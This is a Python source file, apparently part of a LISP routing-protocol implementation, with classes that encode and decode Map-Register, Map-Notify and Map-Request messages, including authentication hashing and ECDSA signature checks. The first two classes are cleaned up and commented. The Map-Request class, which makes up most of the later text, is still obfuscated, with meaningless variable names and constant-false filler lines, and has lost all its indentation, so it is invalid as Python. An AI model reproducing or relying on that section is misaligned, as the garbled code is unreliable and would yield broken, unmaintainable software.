if 72 - 72: OOooOOo . OoOoOO00 / II111iiii
class lisp_map_register():
    """Encoder/decoder for a LISP Map-Register message (RFC 6833).

    An ETR sends a Map-Register to a Map-Server to register the EID
    prefixes it serves.  This class holds the fixed message header; the
    EID-records themselves are appended/consumed by the caller.
    """

    def __init__(self):
        # Header flag bits.
        self.proxy_reply_requested = False
        self.lisp_sec_present = False
        self.xtr_id_present = False
        self.map_notify_requested = False
        self.mobile_node = False
        self.merge_register_requested = False
        self.use_ttl_for_timeout = False
        self.map_register_refresh = False
        # Header values.  (The original initialized record_count twice;
        # the redundant duplicate assignment was dropped -- no behavior
        # change.)
        self.record_count = 0
        self.nonce = 0
        self.alg_id = 0
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = 0
        self.xtr_id = 0
        self.site_id = 0
        # Transport/bookkeeping fields, not part of the first header long.
        self.sport = 0
        self.encrypt_bit = 0
        self.encryption_key_id = None

    def print_map_register(self):
        """Log a one-line human-readable summary via lprint()."""
        xtr_id_str = lisp_hex_string(self.xtr_id)

        line = ("{} -> flags: {}{}{}{}{}{}{}{}{}, record-count: " +
            "{}, nonce: 0x{}, key/alg-id: {}/{}{}, auth-len: {}, xtr-id: " +
            "0x{}, site-id: {}")

        # NOTE(review): the "(sha1)"/"(sha2)" suffix tests compare key_id
        # against *alg-id* constants, exactly as the original did -- looks
        # like it was meant to test alg_id; confirm before changing.
        lprint(line.format(bold("Map-Register", False),
            "P" if self.proxy_reply_requested else "p",
            "S" if self.lisp_sec_present else "s",
            "I" if self.xtr_id_present else "i",
            "T" if self.use_ttl_for_timeout else "t",
            "R" if self.merge_register_requested else "r",
            "M" if self.mobile_node else "m",
            "N" if self.map_notify_requested else "n",
            "F" if self.map_register_refresh else "f",
            "E" if self.encrypt_bit else "e",
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id,
            " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) else
            (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else ""),
            self.auth_len, xtr_id_str, self.site_id))

    def encode(self):
        """Build the fixed Map-Register header in network byte order.

        Side effect: sets self.auth_len from self.alg_id.  Returns the
        header with the authentication field zero-filled; encode_auth()
        patches the real hash in afterwards.
        """
        first_long = (LISP_MAP_REGISTER << 28) | self.record_count
        if (self.proxy_reply_requested): first_long |= 0x08000000
        if (self.lisp_sec_present): first_long |= 0x04000000
        if (self.xtr_id_present): first_long |= 0x02000000
        if (self.map_register_refresh): first_long |= 0x1000
        if (self.use_ttl_for_timeout): first_long |= 0x800
        if (self.merge_register_requested): first_long |= 0x400
        if (self.mobile_node): first_long |= 0x200
        if (self.map_notify_requested): first_long |= 0x100
        if (self.encryption_key_id is not None):
            first_long |= 0x2000
            first_long |= self.encryption_key_id << 14

        #
        # Authentication length is implied by the hash algorithm.
        #
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.auth_len = 0
        else:
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                self.auth_len = LISP_SHA1_160_AUTH_DATA_LEN
            if (self.alg_id == LISP_SHA_256_128_ALG_ID):
                self.auth_len = LISP_SHA2_256_AUTH_DATA_LEN

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        packet = self.zero_auth(packet)
        return (packet)

    def zero_auth(self, packet):
        """Zero-fill the authentication field inside packet.

        Used before hashing on send and before verifying on receive.
        Returns packet unchanged when alg-id is LISP_NONE_ALG_ID.
        """
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_data = ""
        auth_len = 0
        if (self.alg_id == LISP_NONE_ALG_ID): return (packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
            auth_len = struct.calcsize("QQI")
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
            auth_len = struct.calcsize("QQQQ")
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return (packet)

    def encode_auth(self, packet):
        """Splice self.auth_data into the authentication field of packet."""
        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        auth_data = self.auth_data
        packet = packet[0:offset] + auth_data + packet[offset + auth_len::]
        return (packet)

    def decode(self, packet):
        """Parse a Map-Register from packet.

        Returns [orig_packet, remainder]: orig_packet is the whole message
        with the auth field zeroed (ready for hash verification) and
        remainder points at the first EID-record.  Returns [None, None]
        on any parse or validation failure.
        """
        orig_packet = packet
        fmt = "I"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return ([None, None])

        first_long = struct.unpack(fmt, packet[:size])
        first_long = socket.ntohl(first_long[0])
        packet = packet[size::]

        fmt = "QBBH"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return ([None, None])

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(fmt, packet[:size])

        self.auth_len = socket.ntohs(self.auth_len)
        self.proxy_reply_requested = True if (first_long & 0x08000000) \
            else False
        self.lisp_sec_present = True if (first_long & 0x04000000) else False
        self.xtr_id_present = True if (first_long & 0x02000000) else False
        self.use_ttl_for_timeout = True if (first_long & 0x800) else False
        self.map_register_refresh = True if (first_long & 0x1000) else False
        self.merge_register_requested = True if (first_long & 0x400) \
            else False
        self.mobile_node = True if (first_long & 0x200) else False
        self.map_notify_requested = True if (first_long & 0x100) else False
        self.record_count = first_long & 0xff

        self.encrypt_bit = True if first_long & 0x2000 else False
        if (self.encrypt_bit):
            self.encryption_key_id = (first_long >> 14) & 0x7

        #
        # The xtr-id/site-id trailer sits at the very end of the message,
        # so extract it from the original full packet.
        #
        if (self.xtr_id_present):
            if (self.decode_xtr_id(orig_packet) == False):
                return ([None, None])

        packet = packet[size::]

        #
        # Pull out and validate the authentication data, then zero it in
        # the original packet so the caller can recompute the hash.
        #
        if (self.auth_len != 0):
            if (len(packet) < self.auth_len): return ([None, None])

            if (self.alg_id not in (LISP_NONE_ALG_ID, LISP_SHA_1_96_ALG_ID,
                LISP_SHA_256_128_ALG_ID)):
                lprint("Invalid authentication alg-id: {}".format(
                    self.alg_id))
                return ([None, None])

            auth_len = self.auth_len
            if (self.alg_id == LISP_SHA_1_96_ALG_ID):
                size = struct.calcsize("QQI")
                if (auth_len < size):
                    lprint("Invalid sha1-96 authentication length")
                    return ([None, None])
                auth1, auth2, auth3 = struct.unpack("QQI",
                    packet[:auth_len])
                auth4 = ""
            elif (self.alg_id == LISP_SHA_256_128_ALG_ID):
                size = struct.calcsize("QQQQ")
                if (auth_len < size):
                    lprint("Invalid sha2-256 authentication length")
                    return ([None, None])
                auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                    packet[:auth_len])
            else:
                lprint("Unsupported authentication alg-id value {}".format(
                    self.alg_id))
                return ([None, None])

            self.auth_data = lisp_concat_auth_data(self.alg_id, auth1,
                auth2, auth3, auth4)
            orig_packet = self.zero_auth(orig_packet)
            packet = packet[self.auth_len::]

        return ([orig_packet, packet])

    def encode_xtr_id(self, packet):
        """Append the 128-bit xtr-id and 64-bit site-id trailer to packet."""
        upper = self.xtr_id >> 64
        lower = self.xtr_id & 0xffffffffffffffff
        upper = byte_swap_64(upper)
        lower = byte_swap_64(lower)
        site_id = byte_swap_64(self.site_id)
        packet += struct.pack("QQQ", upper, lower, site_id)
        return (packet)

    def decode_xtr_id(self, packet):
        """Extract xtr-id/site-id from the trailer at the end of packet.

        Returns True on success, False when the packet is too short.
        BUG FIX: the original returned [None, None] on a short packet,
        which the caller's '== False' test never matched, so truncated
        packets slipped through undetected.
        """
        size = struct.calcsize("QQQ")
        if (len(packet) < size): return (False)
        packet = packet[len(packet) - size::]
        upper, lower, site_id = struct.unpack("QQQ", packet[:size])
        upper = byte_swap_64(upper)
        lower = byte_swap_64(lower)
        self.xtr_id = (upper << 64) | lower
        self.site_id = byte_swap_64(site_id)
        return (True)
# (Removed dead obfuscator filler: a run of constant-false "if N - N: ..."
# statements whose bodies could never execute. No behavior change.)
class lisp_map_notify():
    """A LISP Map-Notify / Map-Notify-Ack message (RFC 6833).

    A Map-Server sends a Map-Notify to acknowledge a Map-Register (or to
    push mapping changes); the receiver answers with a Map-Notify-Ack.
    Holds header fields plus retransmission bookkeeping.
    """

    def __init__(self, lisp_sockets):
        # Destination ETR and retransmission state.
        self.etr = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.etr_port = 0
        self.retransmit_timer = None
        self.lisp_sockets = lisp_sockets
        self.retry_count = 0
        # Wire-header fields.
        self.record_count = 0
        self.alg_id = LISP_NONE_ALG_ID
        self.key_id = 0
        self.auth_len = 0
        self.auth_data = ""
        self.nonce = 0
        self.nonce_key = ""
        # Cached encoding and payload bookkeeping.
        self.packet = None
        self.site = ""
        self.map_notify_ack = False
        self.eid_records = ""
        self.eid_list = []

    def print_notify(self):
        """Log a one-line human-readable summary via lprint()."""
        auth = binascii.hexlify(self.auth_data)
        # Fall back to the raw value when the hex length does not match
        # the algorithm's expected digest size.
        if (self.alg_id == LISP_SHA_1_96_ALG_ID and len(auth) != 40):
            auth = self.auth_data
        elif (self.alg_id == LISP_SHA_256_128_ALG_ID and len(auth) != 64):
            auth = self.auth_data

        line = ("{} -> record-count: {}, nonce: 0x{}, key/alg-id: " +
            "{}{}{}, auth-len: {}, auth-data: {}")
        lprint(line.format(
            bold("Map-Notify-Ack", False) if self.map_notify_ack else
            bold("Map-Notify", False),
            self.record_count, lisp_hex_string(self.nonce), self.key_id,
            self.alg_id,
            " (sha1)" if (self.key_id == LISP_SHA_1_96_ALG_ID) else
            (" (sha2)" if (self.key_id == LISP_SHA_256_128_ALG_ID) else ""),
            self.auth_len, auth))

    def zero_auth(self, packet):
        """Append a zero-filled authentication field sized for alg_id."""
        if (self.alg_id == LISP_NONE_ALG_ID): return (packet)
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth_data = struct.pack("QQI", 0, 0, 0)
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth_data = struct.pack("QQQQ", 0, 0, 0, 0)
        packet += auth_data
        return (packet)

    def encode(self, eid_records, password):
        """Encode header + eid_records, authenticating with password.

        Caches the result in self.packet and returns it.
        """
        if (self.map_notify_ack):
            first_long = (LISP_MAP_NOTIFY_ACK << 28) | self.record_count
        else:
            first_long = (LISP_MAP_NOTIFY << 28) | self.record_count

        packet = struct.pack("I", socket.htonl(first_long))
        packet += struct.pack("QBBH", self.nonce, self.key_id, self.alg_id,
            socket.htons(self.auth_len))

        # No authentication: header plus records, done.
        if (self.alg_id == LISP_NONE_ALG_ID):
            self.packet = packet + eid_records
            return (self.packet)

        # Hash over the message with a zeroed auth field, then splice the
        # resulting digest into that field.
        packet = self.zero_auth(packet)
        packet += eid_records

        digest = lisp_hash_me(packet, self.alg_id, password, False)

        offset = struct.calcsize("I") + struct.calcsize("QHH")
        auth_len = self.auth_len
        self.auth_data = digest
        packet = packet[0:offset] + digest + packet[offset + auth_len::]
        self.packet = packet
        return (packet)

    def decode(self, packet):
        """Parse a Map-Notify(-Ack) from packet.

        Stores header fields on self and returns the message with the
        auth field zeroed (for hash verification), or the EID-records
        directly when there is no authentication.  Returns None when the
        packet is too short.
        """
        orig_packet = packet
        fmt = "I"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return (None)

        first_long = struct.unpack(fmt, packet[:size])
        first_long = socket.ntohl(first_long[0])
        self.map_notify_ack = ((first_long >> 28) == LISP_MAP_NOTIFY_ACK)
        self.record_count = first_long & 0xff
        packet = packet[size::]

        fmt = "QBBH"
        size = struct.calcsize(fmt)
        if (len(packet) < size): return (None)

        self.nonce, self.key_id, self.alg_id, self.auth_len = \
            struct.unpack(fmt, packet[:size])

        self.nonce_key = lisp_hex_string(self.nonce)
        self.auth_len = socket.ntohs(self.auth_len)
        packet = packet[size::]
        self.eid_records = packet[self.auth_len::]

        if (self.auth_len == 0): return (self.eid_records)

        # Pull the authentication data out, then rebuild the message with
        # a zeroed auth field so the caller can recompute the digest.
        if (len(packet) < self.auth_len): return (None)

        auth_len = self.auth_len
        if (self.alg_id == LISP_SHA_1_96_ALG_ID):
            auth1, auth2, auth3 = struct.unpack("QQI", packet[:auth_len])
            auth4 = ""
        if (self.alg_id == LISP_SHA_256_128_ALG_ID):
            auth1, auth2, auth3, auth4 = struct.unpack("QQQQ",
                packet[:auth_len])

        self.auth_data = lisp_concat_auth_data(self.alg_id, auth1, auth2,
            auth3, auth4)

        size = struct.calcsize("I") + struct.calcsize("QHH")
        packet = self.zero_auth(orig_packet[:size])
        size += auth_len
        packet += orig_packet[size::]
        return (packet)
# (Removed dead obfuscator filler: a run of constant-false "if N - N: ..."
# statements whose bodies could never execute. No behavior change.)
class lisp_map_request ( ) :
def __init__ ( self ) :
self . auth_bit = False
self . map_data_present = False
self . rloc_probe = False
self . smr_bit = False
self . pitr_bit = False
self . smr_invoked_bit = False
self . mobile_node = False
self . xtr_id_present = False
self . local_xtr = False
self . dont_reply_bit = False
self . itr_rloc_count = 0
self . record_count = 0
self . nonce = 0
self . signature_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . source_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . target_group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
self . itr_rlocs = [ ]
self . keys = None
self . privkey_filename = None
self . map_request_signature = None
self . subscribe_bit = False
self . xtr_id = None
if 30 - 30: OoooooooOO % o0oOOo0O0Ooo + ooOoO0o * OoO0O00
if 57 - 57: I11i + iIii1I11I1II1 . OoO0O00 + oO0o
def print_prefix ( self ) :
if ( self . target_group . is_null ( ) ) :
return ( green ( self . target_eid . print_prefix ( ) , False ) )
if 4 - 4: Ii1I
return ( green ( self . target_eid . print_sg ( self . target_group ) , False ) )
if 43 - 43: i1IIi . I1IiiI * iIii1I11I1II1 * i11iIiiIii - OOooOOo + ooOoO0o
if 56 - 56: Oo0Ooo % i11iIiiIii / Ii1I . I1Ii111 . OoO0O00 - OoOoOO00
def print_map_request ( self ) :
oOo0 = ""
if ( self . xtr_id != None and self . subscribe_bit ) :
oOo0 = "subscribe, xtr-id: 0x{}, " . format ( lisp_hex_string ( self . xtr_id ) )
if 32 - 32: I1Ii111 / oO0o / I1IiiI
if 22 - 22: OoO0O00 - OoOoOO00 . Oo0Ooo + o0oOOo0O0Ooo
if 69 - 69: oO0o - I1IiiI
I111 = ( "{} -> flags: {}{}{}{}{}{}{}{}{}{}, itr-rloc-" +
"count: {} (+1), record-count: {}, nonce: 0x{}, source-eid: " +
"afi {}, {}{}, target-eid: afi {}, {}, {}ITR-RLOCs:" )
if 10 - 10: i1IIi / iII111i . II111iiii * i1IIi % OoooooooOO
lprint ( I111 . format ( bold ( "Map-Request" , False ) , "A" if self . auth_bit else "a" ,
# O0 * Oo0Ooo % I1Ii111 - O0 * I11i
"D" if self . map_data_present else "d" ,
"R" if self . rloc_probe else "r" ,
"S" if self . smr_bit else "s" ,
"P" if self . pitr_bit else "p" ,
"I" if self . smr_invoked_bit else "i" ,
"M" if self . mobile_node else "m" ,
"X" if self . xtr_id_present else "x" ,
"L" if self . local_xtr else "l" ,
"D" if self . dont_reply_bit else "d" , self . itr_rloc_count ,
self . record_count , lisp_hex_string ( self . nonce ) ,
self . source_eid . afi , green ( self . source_eid . print_address ( ) , False ) ,
" (with sig)" if self . map_request_signature != None else "" ,
self . target_eid . afi , green ( self . print_prefix ( ) , False ) , oOo0 ) )
if 48 - 48: oO0o - OoooooooOO + o0oOOo0O0Ooo % i1IIi - I1IiiI + OOooOOo
O0000 = self . keys
for oo0O0oO0o in self . itr_rlocs :
lprint ( " itr-rloc: afi {} {}{}" . format ( oo0O0oO0o . afi ,
red ( oo0O0oO0o . print_address_no_iid ( ) , False ) ,
"" if ( O0000 == None ) else ", " + O0000 [ 1 ] . print_keys ( ) ) )
O0000 = None
if 37 - 37: O0
if 34 - 34: IiII
if 5 - 5: OoO0O00 . I1IiiI
def sign_map_request ( self , privkey ) :
IIiII11i1 = self . signature_eid . print_address ( )
i1Iii = self . source_eid . print_address ( )
oOOooo = self . target_eid . print_address ( )
IiI11IiIIi = lisp_hex_string ( self . nonce ) + i1Iii + oOOooo
self . map_request_signature = privkey . sign ( IiI11IiIIi )
oOOo0OoooOo = binascii . b2a_base64 ( self . map_request_signature )
oOOo0OoooOo = { "source-eid" : i1Iii , "signature-eid" : IIiII11i1 ,
"signature" : oOOo0OoooOo }
return ( json . dumps ( oOOo0OoooOo ) )
if 33 - 33: I11i * iII111i + iIii1I11I1II1 - I1ii11iIi11i
if 11 - 11: II111iiii + OoOoOO00 * I11i
def verify_map_request_sig ( self , pubkey ) :
i1IiIII = green ( self . signature_eid . print_address ( ) , False )
if ( pubkey == None ) :
lprint ( "Public-key not found for signature-EID {}" . format ( i1IiIII ) )
return ( False )
if 89 - 89: ooOoO0o + oO0o + Ii1I - OOooOOo
if 12 - 12: OoOoOO00 - o0oOOo0O0Ooo - I1Ii111 / I11i
i1Iii = self . source_eid . print_address ( )
oOOooo = self . target_eid . print_address ( )
IiI11IiIIi = lisp_hex_string ( self . nonce ) + i1Iii + oOOooo
pubkey = binascii . a2b_base64 ( pubkey )
if 17 - 17: OoO0O00 - I1Ii111 - II111iiii / I1Ii111 / Ii1I
I11III111i1I = True
try :
iII1 = ecdsa . VerifyingKey . from_pem ( pubkey )
except :
lprint ( "Invalid public-key in mapping system for sig-eid {}" . format ( self . signature_eid . print_address_no_iid ( ) ) )
if 52 - 52: iII111i % iIii1I11I1II1 . I1ii11iIi11i + oO0o % iII111i * iII111i
I11III111i1I = False
if 83 - 83: oO0o - I1Ii111
if 46 - 46: i11iIiiIii
if ( I11III111i1I ) :
try :
I11III111i1I = iII1 . verify ( self . map_request_signature , IiI11IiIIi )
except :
I11III111i1I = False
if 33 - 33: ooOoO0o / iII111i * Ii1I % i1IIi
if 50 - 50: Oo0Ooo - O0 - oO0o % o0oOOo0O0Ooo / iII111i % iIii1I11I1II1
if 9 - 9: OoOoOO00 * o0oOOo0O0Ooo
I1i1I11I = bold ( "passed" if I11III111i1I else "failed" , False )
lprint ( "Signature verification {} for EID {}" . format ( I1i1I11I , i1IiIII ) )
return ( I11III111i1I )
if 85 - 85: I1ii11iIi11i + iIii1I11I1II1 + I1Ii111 * i1IIi - O0 % iII111i
if 32 - 32: Ii1I % I11i + OOooOOo % OoooooooOO
def encode ( self , probe_dest , probe_port ) :
i1IiIiiiii11 = ( LISP_MAP_REQUEST << 28 ) | self . record_count
i1IiIiiiii11 = i1IiIiiiii11 | ( self . itr_rloc_count << 8 )
if ( self . auth_bit ) : i1IiIiiiii11 |= 0x08000000
if ( self . map_data_present ) : i1IiIiiiii11 |= 0x04000000
if ( self . rloc_probe ) : i1IiIiiiii11 |= 0x02000000
if ( self . smr_bit ) : i1IiIiiiii11 |= 0x01000000
if ( self . pitr_bit ) : i1IiIiiiii11 |= 0x00800000
if ( self . smr_invoked_bit ) : i1IiIiiiii11 |= 0x00400000
if ( self . mobile_node ) : i1IiIiiiii11 |= 0x00200000
if ( self . xtr_id_present ) : i1IiIiiiii11 |= 0x00100000
if ( self . local_xtr ) : i1IiIiiiii11 |= 0x00004000
if ( self . dont_reply_bit ) : i1IiIiiiii11 |= 0x00002000
if 68 - 68: I11i
ii1i1II = struct . pack ( "I" , socket . htonl ( i1IiIiiiii11 ) )
ii1i1II += struct . pack ( "Q" , self . nonce )
if 13 - 13: i11iIiiIii - ooOoO0o
if 54 - 54: I1IiiI * I1IiiI - I11i . O0 . iII111i - Ii1I
if 86 - 86: I1IiiI . II111iiii * i1IIi % I1IiiI . OOooOOo
if 79 - 79: OoO0O00 + O0 * OOooOOo
if 51 - 51: i1IIi - oO0o / oO0o % o0oOOo0O0Ooo
if 98 - 98: OoO0O00 * ooOoO0o + i1IIi + IiII - i1IIi % OoOoOO00
iiiI1iiIiII1 = False
oOo0oOOoo0O = self . privkey_filename
if ( oOo0oOOoo0O != None and os . path . exists ( oOo0oOOoo0O ) ) :
iI1IiI11Ii11i = open ( oOo0oOOoo0O , "r" ) ; iII1 = iI1IiI11Ii11i . read ( ) ; iI1IiI11Ii11i . close ( )
try :
iII1 = ecdsa . SigningKey . from_pem ( iII1 )
except :
return ( None )
if 67 - 67: ooOoO0o . iIii1I11I1II1 . OoO0O00 + I1Ii111
o0OOOO00O = self . sign_map_request ( iII1 )
iiiI1iiIiII1 = True
elif ( self . map_request_signature != None ) :
oOOo0OoooOo = binascii . b2a_base64 ( self . map_request_signature )
o0OOOO00O = { "source-eid" : self . source_eid . print_address ( ) ,
"signature-eid" : self . signature_eid . print_address ( ) ,
"signature" : oOOo0OoooOo }
o0OOOO00O = json . dumps ( o0OOOO00O )
iiiI1iiIiII1 = True
if 58 - 58: OoOoOO00
if ( iiiI1iiIiII1 ) :
iiii1II = LISP_LCAF_JSON_TYPE
I1I1iiI1iIIii = socket . htons ( LISP_AFI_LCAF )
o00O0oOO0o = socket . htons ( len ( o0OOOO00O ) + 2 )
O0000000oooOO = socket . htons ( len ( o0OOOO00O ) )
ii1i1II += struct . pack ( "HBBBBHH" , I1I1iiI1iIIii , 0 , 0 , iiii1II , 0 ,
o00O0oOO0o , O0000000oooOO )
ii1i1II += o0OOOO00O
ii1i1II += struct . pack ( "H" , 0 )
else :
if ( self . source_eid . instance_id != 0 ) :
ii1i1II += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
ii1i1II += self . source_eid . lcaf_encode_iid ( )
else :
ii1i1II += struct . pack ( "H" , socket . htons ( self . source_eid . afi ) )
ii1i1II += self . source_eid . pack_address ( )
if 7 - 7: OoO0O00 - ooOoO0o % i1IIi
if 24 - 24: OoO0O00 % O0 % I11i
if 61 - 61: ooOoO0o . iII111i / ooOoO0o * OoooooooOO
if 13 - 13: II111iiii
if 17 - 17: II111iiii
if 66 - 66: IiII * oO0o
if 73 - 73: i11iIiiIii + O0 % O0
if ( probe_dest ) :
if ( probe_port == 0 ) : probe_port = LISP_DATA_PORT
oOo0O = probe_dest . print_address_no_iid ( ) + ":" + str ( probe_port )
if 70 - 70: II111iiii * OoooooooOO - Ii1I + oO0o * O0
if ( lisp_crypto_keys_by_rloc_encap . has_key ( oOo0O ) ) :
self . keys = lisp_crypto_keys_by_rloc_encap [ oOo0O ]
if 49 - 49: oO0o . Ii1I . OoOoOO00 - I1ii11iIi11i
if 74 - 74: ooOoO0o % I1ii11iIi11i * i1IIi
if 18 - 18: OoOoOO00
if 30 - 30: II111iiii
if 27 - 27: i1IIi - iIii1I11I1II1 + O0 % Oo0Ooo / OOooOOo + i1IIi
if 48 - 48: Oo0Ooo
if 70 - 70: OoooooooOO * i11iIiiIii
for oo0O0oO0o in self . itr_rlocs :
if ( lisp_data_plane_security and self . itr_rlocs . index ( oo0O0oO0o ) == 0 ) :
if ( self . keys == None or self . keys [ 1 ] == None ) :
O0000 = lisp_keys ( 1 )
self . keys = [ None , O0000 , None , None ]
if 60 - 60: IiII / iIii1I11I1II1 + OoooooooOO - I1ii11iIi11i * i11iIiiIii
O0000 = self . keys [ 1 ]
O0000 . add_key_by_nonce ( self . nonce )
ii1i1II += O0000 . encode_lcaf ( oo0O0oO0o )
else :
ii1i1II += struct . pack ( "H" , socket . htons ( oo0O0oO0o . afi ) )
ii1i1II += oo0O0oO0o . pack_address ( )
if 47 - 47: O0 . I1IiiI / ooOoO0o % i11iIiiIii
if 47 - 47: Ii1I . OoOoOO00 . iIii1I11I1II1 . o0oOOo0O0Ooo
if 39 - 39: o0oOOo0O0Ooo
Ooo0o00 = 0 if self . target_eid . is_binary ( ) == False else self . target_eid . mask_len
if 75 - 75: iIii1I11I1II1 * iII111i / OoOoOO00 * II111iiii . i1IIi
if 6 - 6: Ii1I % Ii1I / OoooooooOO * oO0o . I1IiiI . i1IIi
O00 = 0
if ( self . subscribe_bit ) :
O00 = 0x80
self . xtr_id_present = True
if ( self . xtr_id == None ) :
self . xtr_id = random . randint ( 0 , ( 2 ** 128 ) - 1 )
if 74 - 74: iII111i / OoOoOO00 % oO0o / i1IIi
if 19 - 19: O0 + OoOoOO00 * OoOoOO00 . iII111i
if 73 - 73: ooOoO0o
o00OooooOOOO = "BB"
ii1i1II += struct . pack ( o00OooooOOOO , O00 , Ooo0o00 )
if 14 - 14: Oo0Ooo % iIii1I11I1II1 - iIii1I11I1II1 . iIii1I11I1II1 - o0oOOo0O0Ooo * I1Ii111
if ( self . target_group . is_null ( ) == False ) :
ii1i1II += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
ii1i1II += self . target_eid . lcaf_encode_sg ( self . target_group )
elif ( self . target_eid . instance_id != 0 or
self . target_eid . is_geo_prefix ( ) ) :
ii1i1II += struct . pack ( "H" , socket . htons ( LISP_AFI_LCAF ) )
ii1i1II += self . target_eid . lcaf_encode_iid ( )
else :
ii1i1II += struct . pack ( "H" , socket . htons ( self . target_eid . afi ) )
ii1i1II += self . target_eid . pack_address ( )
if 10 - 10: OoO0O00 - II111iiii % o0oOOo0O0Ooo - OoOoOO00 + OoO0O00
if 88 - 88: iIii1I11I1II1 % ooOoO0o + o0oOOo0O0Ooo * OoOoOO00 / I11i . OoO0O00
if 66 - 66: iIii1I11I1II1 * II111iiii . iIii1I11I1II1 * i11iIiiIii + I11i + Ii1I
if 94 - 94: i1IIi * I11i - OoooooooOO . i1IIi / o0oOOo0O0Ooo
if 51 - 51: i11iIiiIii * OoooooooOO
if ( self . subscribe_bit ) : ii1i1II = self . encode_xtr_id ( ii1i1II )
return ( ii1i1II )
if 23 - 23: II111iiii + I11i / O0 . I11i . I1Ii111 + iIii1I11I1II1
if 2 - 2: i1IIi . O0 / o0oOOo0O0Ooo . II111iiii / OoO0O00 % i1IIi
def lcaf_decode_json ( self , packet ) :
o00OooooOOOO = "BBBBHH"
oO0o00O = struct . calcsize ( o00OooooOOOO )
if ( len ( packet ) < oO0o00O ) : return ( None )
if 12 - 12: o0oOOo0O0Ooo
Ooo0o00O0O0oO , OO000OOO , iiii1II , o000OOooo000O , o00O0oOO0o , O0000000oooOO = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] )
if 69 - 69: O0 . iII111i
if 96 - 96: O0
if ( iiii1II != LISP_LCAF_JSON_TYPE ) : return ( packet )
if 89 - 89: I1ii11iIi11i - Oo0Ooo
if 26 - 26: ooOoO0o % ooOoO0o / II111iiii / iII111i
if 2 - 2: i1IIi / i11iIiiIii + I1IiiI
if 95 - 95: I1ii11iIi11i / IiII % iIii1I11I1II1 + O0
o00O0oOO0o = socket . ntohs ( o00O0oOO0o )
O0000000oooOO = socket . ntohs ( O0000000oooOO )
packet = packet [ oO0o00O : : ]
if ( len ( packet ) < o00O0oOO0o ) : return ( None )
if ( o00O0oOO0o != O0000000oooOO + 2 ) : return ( None )
if 6 - 6: IiII
if 73 - 73: o0oOOo0O0Ooo % o0oOOo0O0Ooo . OOooOOo * I1ii11iIi11i - Ii1I
if 97 - 97: IiII
if 15 - 15: O0 - I1IiiI / i1IIi . I1Ii111
try :
o0OOOO00O = json . loads ( packet [ 0 : O0000000oooOO ] )
except :
return ( None )
if 64 - 64: ooOoO0o / i1IIi
packet = packet [ O0000000oooOO : : ]
if 100 - 100: II111iiii
if 16 - 16: Ii1I
if 96 - 96: o0oOOo0O0Ooo / I1Ii111 % Ii1I - ooOoO0o
if 35 - 35: OOooOOo
o00OooooOOOO = "H"
oO0o00O = struct . calcsize ( o00OooooOOOO )
oO0oO00 = struct . unpack ( o00OooooOOOO , packet [ : oO0o00O ] ) [ 0 ]
packet = packet [ oO0o00O : : ]
if ( oO0oO00 != 0 ) : return ( packet )
if 90 - 90: i11iIiiIii
if 47 - 47: OoO0O00 . i11iIiiIii
if 9 - 9: OoOoOO00 - I11i . OoooooooOO % ooOoO0o
if 13 - 13: OoO0O00 * iIii1I11I1II1 + II111iiii - Oo0Ooo - OoOoOO00
if ( o0OOOO00O . has_key ( "source-eid" ) == False ) : return ( packet )
I111o0oooO00o0 = o0OOOO00O [ "source-eid" ]
oO0oO00 = LISP_AFI_IPV4 if I111o0oooO00o0 . count ( "." ) == 3 else LISP_AFI_IPV6 if I111o0oooO00o0 . count ( ":" ) == 7 else None
if 3 - 3: i11iIiiIii / I11i + i1IIi - I11i
if ( oO0oO00 == None ) :
lprint ( "Bad JSON 'source-eid' value: {}" . format ( I111o0oooO00o0 ) )
return ( None )
if 50 - 50: i1IIi
if 56 - 56: OoO0O00 + I1Ii111 / Ii1I
self . source_eid . afi = oO0oO00
self . source_eid . store_address ( I111o0oooO00o0 )
if 75 - 75: OoOoOO00
if ( o0OOOO00O . has_key ( "signature-eid" ) == False ) : return ( packet )
I111o0oooO00o0 = o0OOOO00O [ "signature-eid" ]
if ( I111o0oooO00o0 . count ( ":" ) != 7 ) :
lprint ( "Bad JSON 'signature-eid' value: {}" . format ( I111o0oooO00o0 ) )
return ( None )
if 96 - 96: o0oOOo0O0Ooo * I11i * Oo0Ooo
if 36 - 36: OoooooooOO + ooOoO0o . oO0o * ooOoO0o + IiII
self . signature_eid . afi = LISP_AFI_IPV6
self . signature_eid . store_address ( I111o0oooO00o0 )
if 45 - 45: oO0o / iII111i + I1ii11iIi11i - Oo0Ooo - ooOoO0o . iIii1I11I1II1
if ( o0OOOO00O . has_key ( "signature" ) == False ) : return ( packet )
oOOo0OoooOo = binascii . a2b_base64 ( o0OOOO00O [ "signature" ] )
self . map_request_signature = oOOo0OoooOo
return ( packet )
if 52 - 52: I1IiiI + i1IIi . iII111i * I1IiiI
